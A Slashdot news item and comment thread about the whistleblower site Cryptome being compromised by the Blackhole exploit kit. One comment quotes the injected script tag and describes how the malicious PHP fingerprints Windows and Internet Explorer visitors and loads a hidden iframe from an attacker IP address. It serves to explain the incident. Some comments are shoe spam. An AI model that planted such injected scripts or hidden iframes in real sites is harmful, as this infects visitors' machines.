Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Cryptome Hit By Blackhole Exploit Kit

Unknown Lamer posted more than 2 years ago | from the leaks-were-sleeping-around dept.

Security 49

wiredmikey writes with an excerpt from Security Week:"Whistleblower site Cryptome has been hacked and infected by the Blackhole exploit kit. ... Cryptome co-founder John Young however told SecurityWeek that the Cryptome site is in the process of cleaning everything up, and that process should be finished by the end of the day. Founded in 1996, Cryptome publishes thousands of documents, including many related to national security, law enforcement and military. On Feb. 12, a reader advised the site that accessing a file had triggered a warning in their antivirus about the Blackhole exploit kit. ... Subsequent analysis found thousands of files on the site had been infected." Cryptome has certainly seen worse.

cancel ×

49 comments

Sorry! There are no comments related to the filter you selected.

frosty day in hell when (1)

Anonymous Coward | more than 2 years ago | (#39026729)

security whistleblowers get hacked? neverrrrrrrrrrrrrrrrrrrrrr

Don't criticize, do it ! (2, Insightful)

Taco Cowboy (5327) | more than 2 years ago | (#39027251)

If you can set up a public website so secure that no hacker can ever hack, why don't you set one up?

Instead of criticize, why don't you show the world that such a site is indeed possible?

Maybe you can even make a buck or two out of it

Re:Don't criticize, do it ! (3, Informative)

hweimer (709734) | more than 2 years ago | (#39028641)

If you can set up a public website so secure that no hacker can ever hack, why don't you set one up?

Formally verified web servers [nist.gov] have been around for a while.

Re:Don't criticize, do it ! (4, Insightful)

Anonymous Coward | more than 2 years ago | (#39029913)

"Formally verified web servers have been around for a while."

This reminds me of Knuth's famous quote about some code he released:

"Beware of bugs in the above code; I have only proved it correct, not tried it."

Re:Don't criticize, do it ! (1)

Anonymous Coward | more than 2 years ago | (#39031771)

The fact you posed this, and even worse, it was moderated up, is just mind blowing. It wonderfully validates just how completely clueless and out of touch with reality so many people, such as yourself, really are.

The only secure computer is one powered off, locked in a vault. And even then, its only as secure as the one who holds the key.

Formally verified web servers are for CYA and provide only a minimal diference, if any, in the real world.

We at slashdot are all dumber now for having read your post.

The mysterious command (5, Informative)

Anonymous Coward | more than 2 years ago | (#39026755)

< SCRIPT src="/0002/afg/afg.php" >

I'm sure you all will sleep now that your burning curiosity was satisfied.

Re:The mysterious command (0, Troll)

FriendlyLurker (50431) | more than 2 years ago | (#39030107)

Perhaps, just perhaps, Cryptome is infecting its visitors on purpose. You dont publish "thousands of documents, including many related to national security, law enforcement and military" without breaking a few eggs.

Now that the common rabbles antivirus software has caught up, they are in the process of "cleaning up" the code so it wont happen again for a bit... watch this space.

Blackhole (3, Funny)

Hatta (162192) | more than 2 years ago | (#39026765)

Symantec says that Blackhole affects "various Windows platforms". Does Cryptome run on Windows?

Re:Blackhole (5, Informative)

jenic (1231704) | more than 2 years ago | (#39026953)

Symantec says that Blackhole affects "various Windows platforms". Does Cryptome run on Windows?

Whether or not cryptome runs in windows is not for me to say, however I do believe that cryptome was compromised and made to distribute the blackhole exploit. The following is found on TFA:

Although I'm not a full fledged security researcher, I could shed some light on the script that you found on your server. The basic program flow goes like this when a client loads the script (in your case every time anyone visits one of your pages):

  • the client IP address is compared against a list (net_match(...)) and if it falls within the range of the list it is in scope
  • the client OS is determined and if it is a windows machine, it is in scope
  • the client browser is determined and if it is a internet explorer (6.0 until 8.0) it is in scope
  • if the client is in scope (i.e. all three of the previous are true), a file is created on your webserver (empty text file), the filename is the IP address of the client (probably for later retrieval)
  • an iFrame is loaded in the browser of the client that will be impossible to see (width and height of 1 pixel) and that iframe points to the webpage of 'http://65.75.137.243/Home/index.php'

After step 5 probably the browser is under attack and it will probably be a successful attack since the attackers knows the client to be a windows machine running an internet explorer browser, my guess would be that the client is now infected and part of a botnet to be used in other attacks. The IP address of the attacker is a webserver for the domain http://absolutely-free-meeting.com/ [absolutely...eeting.com] I'm not sure they have anything to do with this attack, probably they are a comprimised server like your webserver was compromised. The WHOIS information for this domain is registered by godady and I include their data and the registrants data below, it would be best to contact both so that they can clean up their server also. Conclusion:

  • your webserver was compromised and a file was uploaded (the attacking script)
  • the attacker was only interested in certain IP address (probably only a certain location)
  • the clients that are infected are infected from another web server (no idea why since that attack script could have been put on your webserver also)

PS: I tried to format that as best I could but slashdot was having none of it

Re:Blackhole (2, Insightful)

smudj (1983234) | more than 2 years ago | (#39027025)

Not sure if I would consider Symantec an "expert" in antivirus/anti-intrusion solutions any longer

Re:Blackhole (0)

wbr1 (2538558) | more than 2 years ago | (#39027985)

Sure they are. Just take the 'anti' part off and throw in scareware and RogueAV somewheres.

Re:Blackhole (0)

TheLink (130905) | more than 2 years ago | (#39029557)

The Symantec messages had the phrase "the attack was resulted from", is this considered OK for US English?

Or they've outsourced that bit to somewhere else?

Netcraft confirms it (0)

Anonymous Coward | more than 2 years ago | (#39032109)

That the OS is unknown [netcraft.com]

mysterious (5, Funny)

Moblaster (521614) | more than 2 years ago | (#39026775)

The secret command shows up as a dot (".") on my system.

This may not be enlightening to anyone, but it appears to be a small black hole.

Re:mysterious (2)

steelfood (895457) | more than 2 years ago | (#39027537)

It's just evidence of the LHC working properly.

Re:mysterious (1)

cold fjord (826450) | more than 2 years ago | (#39028771)

You should have warned him not to lean too close to his screen or he could potentially be sucked in and crushed by the immense gravitational forces known in exist in certain configurations of punctuation

Most Slashdotters are aware of the risk and that is why we so often see the more cautious ones omitting any meaningful punctuation

With any luck the LHC will continue past its triumph in explaining the observed asymmetry between grammar and punctuation Nazis to helping us understand the Higgs and the asymmetry in matter and antimatter

Re:mysterious (1)

Genda (560240) | more than 2 years ago | (#39029931)

Also be careful, if the punctuation begins to glow, its reaching the end of its life and is about to evaporate in rather impressive gamma ray burst. The upside, is you can use the burst to sterilize food for long term storage or eliminate unpleasant neighbors.

Re:mysterious (1)

Fjandr (66656) | more than 2 years ago | (#39030189)

even more careful slashdotters avoid the use of capital letters as the increase in mass from the extra black can cause the danger zone to increase in size a great deal

Re:mysterious (5, Funny)

user flynn (236683) | more than 2 years ago | (#39027833)

I clicked on the link and I couldn't see anything.

    Since then I've been slowly depressing my back button for what seems like years... to you.

I've been infected too. (1)

Anonymous Coward | more than 2 years ago | (#39026789)

Almost every single sentence on my system ends in one of those ".". Including this one. Oh my god...

Don't worry (1)

zAPPzAPP (1207370) | more than 2 years ago | (#39026791)

The blackhole may suck up all your whistleblow data, but no one can retrieve it from there.

Re:Don't worry (2, Interesting)

prehistoricman5 (1539099) | more than 2 years ago | (#39026919)

Not true. Black holes emit radiation in the form of Hawking Radiation. Because of the laws of physics, this radiation carries information about what went into the hole. Wikipedia's description is decent. http://en.wikipedia.org/wiki/Black_hole_information_paradox [wikipedia.org]

Re:Don't worry (0)

Anonymous Coward | more than 2 years ago | (#39028661)

Carries information in the same way that a cryptographic hash carries information about a stream of data. Black holes are the universe's hash functions!

"Blackhole WINDOWS Exploit Kit". (4, Informative)

couchslug (175151) | more than 2 years ago | (#39026905)

Yes, it matters.

"Blackhole IE Exploit Kit" (4, Informative)

sakdoctor (1087155) | more than 2 years ago | (#39027051)

This attacks specifically checks for, and excludes browsers which are not IE 6 to 8

Re:"Blackhole BrowserPlugin Exploit Kit" (0)

Anonymous Coward | more than 2 years ago | (#39027551)

What it really looks for is outdated plugins. Lmgtfy'ing for things like spl0, spl1, spl2 all at once might luck out and show you a source. (Just be careful)

I analyzed a blackhole sent to a blackberry, and all the splX functions came back empty, but it still included the PluginCheck code.

Why would the operator care what browser you have? As long as your java runtime is pre 6u29 its all the same.

Re:"Blackhole IE Exploit Kit" (0)

Anonymous Coward | more than 2 years ago | (#39033631)

So it's an educational contribution for the betterment of the internet.

Re:"Blackhole WINDOWS Exploit Kit". (0)

Anonymous Coward | more than 2 years ago | (#39033873)

lexus Trike www.7gnomov.biz/category_6.html

How Nice (-1)

rudy_wayne (414635) | more than 2 years ago | (#39026969)

Yet another "security" website that can't be arsed to actually secure their own shit.

Re:How Nice (1)

equex (747231) | more than 2 years ago | (#39030957)

This is not a security site. Also, does any of these elite security websites have a 100% clean record?

Blackhole expliot kit?? (1)

Tyrannosaur (2485772) | more than 2 years ago | (#39026999)

Doc this is heavy!

Hmm (2)

koan (80826) | more than 2 years ago | (#39027115)

The thing that bothers em most about this is that it was an end users anti-virus that detected it rather than software protecting the servers.

Re:Hmm (1)

AHuxley (892839) | more than 2 years ago | (#39027917)

Would some hosts not have "software protecting the servers" as a monthly or yearly upgrade in their basic to pro hosting options?

Re:Hmm (1)

koan (80826) | more than 2 years ago | (#39028749)

Not sure what you're saying, in general I expect a server to have better protection than a client.

Re:Hmm (1)

AHuxley (892839) | more than 2 years ago | (#39029053)

Products like Sitelock might be offered per year per domain. http://www.sitelock.com/products.php [sitelock.com]
See how the protection offered expands from a basic to premium services.
Your host might offer https, static, databases, web 2.0 look/feel, unlimited data but extra security may be an 'extra'.

Re:Hmm (1)

Lehk228 (705449) | more than 2 years ago | (#39031291)

It makes sense, you can't depend on a compromised system to detect itself

Re:Hmm (1)

koan (80826) | more than 2 years ago | (#39039621)

That's another odd statement, I think the previous guy was trying to sell me something and you seem to be stating the obvious, I would not expect a compromised system to detect an issue (which is what I think you meant) the idea is to keep it from being compromised in the first place.

Re:Hmm (1)

Lehk228 (705449) | more than 2 years ago | (#39106409)

my point is, the software they were using either failed or was circumvented (or they were using none, unlikely)

Doesn't say so in TFA (2, Informative)

Anonymous Coward | more than 2 years ago | (#39027205)

But the infection started on the 8th of February.

Revenge? (1)

cold fjord (826450) | more than 2 years ago | (#39028801)

I have to wonder if this might be some sort of revenge attack due to the feud that has developed between Wikileaks and Cryptome?

Re:Revenge? (1)

Xest (935314) | more than 2 years ago | (#39031059)

I don't think there's really a feud, just that Cryptome got pissy that this new little upstart Wikileaks came and stole all it's glory with leaks that made Cryptome's past leaks look pretty small fry.

Really, Cryptome showed a bit of penis envy, but that was about it.

With the white background in the end it looks even (-1, Offtopic)

manysky211 (2573731) | more than 2 years ago | (#39028947)

2011 New Nike SB Dunks [es-nikedunksb.net] , SB Dunks [es-nikedunksb.net] bearing one of the most skilled Zoom Stefan Janoski re-launch of Nike Dunk [es-nikedunksb.net] a new topic for this two-shoes for the design drawn to cheap nike dunk shoes [es-nikedunksb.net] shoes this back to the face and then return to starting material with dark brown leather for the uppers, Nike SB shoes [es-nikedunksb.net] , to keep up with the unique sailing shoe lace detail, with the white background in the end it looks even more perfect. Nike Dunk shoes [es-nikedunksb.net] .

Re:With the white background in the end it looks e (-1)

Anonymous Coward | more than 2 years ago | (#39029669)

you really think slashdotters give a flying fuck about nike's crappy shoes?

captcha: idlest --didn't know that was a word! yes I am the IDLEST!

Re:With the white background in the end it looks e (0)

Anonymous Coward | more than 2 years ago | (#39035003)

Dude, I don't think the spambot cares what you or anyone else thinks.

Re:With the white background in the end it looks e (1)

Shifty0x88 (1732980) | more than 2 years ago | (#39056505)

jesus, you would think with a post history like manysky211 has, that they would be removed from slashdot. reported as spam.

You insensitive clOd! (-1)

Anonymous Coward | more than 2 years ago | (#39029243)

the lAst nIght of we don't sux0r as

They must be using (0)

Anonymous Coward | more than 2 years ago | (#39033363)

McAfee, 'nuff said.

Analysis (1)

Shifty0x88 (1732980) | more than 2 years ago | (#39056513)

Hey I just sent in my analysis of the PHP file they were asking about.

Anyone wanna take a second look?

I'm not that great of a PHP coder, but maybe a second, third, nth pair of eyes could help figure it all out.

BTW, they called me A6.

Cryptome Hit By Blackhole Exploit Kit (0)

Anonymous Coward | more than 2 years ago | (#39056915)

I wonder how supernam will feel about this.

Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>